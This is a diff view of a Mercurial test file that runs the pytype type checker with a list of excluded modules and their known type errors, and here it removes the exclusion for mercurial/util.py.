38 38 mercurial/sslutil.py # [attribute-error]
39 39 mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types]
40 40 mercurial/testing/storage.py # tons of [attribute-error]
41 41 mercurial/ui.py # [attribute-error], [wrong-arg-types]
42 42 mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error]
43 43 mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error]
44 44 mercurial/util.py # [attribute-error], [wrong-arg-count]
45 45 mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type]
46 46 mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count]
47 47 mercurial/utils/memorytop.py # not 3.6 compatible
48 48 mercurial/win32.py # [not-callable]
49 49 mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error]
50 50 mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error]
51 51 mercurial/wireprotov1peer.py # [attribute-error]
52 52 mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs
53 53 mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error]
54 54
55 55 TODO: use --no-cache on test server? Caching the files locally helps during
56 56 development, but may be a hinderance for CI testing.
57 57
58 58 $ pytype -V 3.6 --keep-going --jobs auto mercurial \
59 59 > -x mercurial/bundlerepo.py \
60 60 > -x mercurial/changegroup.py \
61 61 > -x mercurial/chgserver.py \
62 62 > -x mercurial/cmdutil.py \
63 63 > -x mercurial/context.py \
64 64 > -x mercurial/copies.py \
65 65 > -x mercurial/crecord.py \
66 66 > -x mercurial/debugcommands.py \
67 67 > -x mercurial/dispatch.py \
68 68 > -x mercurial/exchange.py \
69 69 > -x mercurial/hgweb/hgweb_mod.py \
70 70 > -x mercurial/hgweb/server.py \
71 71 > -x mercurial/hgweb/webcommands.py \
72 72 > -x mercurial/hgweb/wsgicgi.py \
73 73 > -x mercurial/httppeer.py \
74 74 > -x mercurial/interfaces \
75 75 > -x mercurial/keepalive.py \
76 76 > -x mercurial/localrepo.py \
77 77 > -x mercurial/lsprof.py \
78 78 > -x mercurial/manifest.py \
79 79 > -x mercurial/minirst.py \
80 80 > -x mercurial/patch.py \
81 81 > -x mercurial/pure/osutil.py \
82 82 > -x mercurial/pure/parsers.py \
83 83 > -x mercurial/pycompat.py \
84 84 > -x mercurial/repoview.py \
85 85 > -x mercurial/sslutil.py \
86 86 > -x mercurial/statprof.py \
87 87 > -x mercurial/testing/storage.py \
88 88 > -x mercurial/thirdparty \
89 89 > -x mercurial/ui.py \
90 90 > -x mercurial/unionrepo.py \
91 91 > -x mercurial/upgrade.py \
92 > -x mercurial/util.py \
93 92 > -x mercurial/utils/procutil.py \
94 93 > -x mercurial/utils/stringutil.py \
95 94 > -x mercurial/utils/memorytop.py \
96 95 > -x mercurial/win32.py \
97 96 > -x mercurial/wireprotoframing.py \
98 97 > -x mercurial/wireprotoserver.py \
99 98 > -x mercurial/wireprotov1peer.py \
100 99 > -x mercurial/wireprotov1server.py \
101 100 > -x mercurial/wireprotov2server.py \
102 101 > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt
103 102
104 103 Only show the results on a failure, because the output on success is also
105 104 voluminous and variable.
General Comments 0
You need to be logged in to leave comments. Login now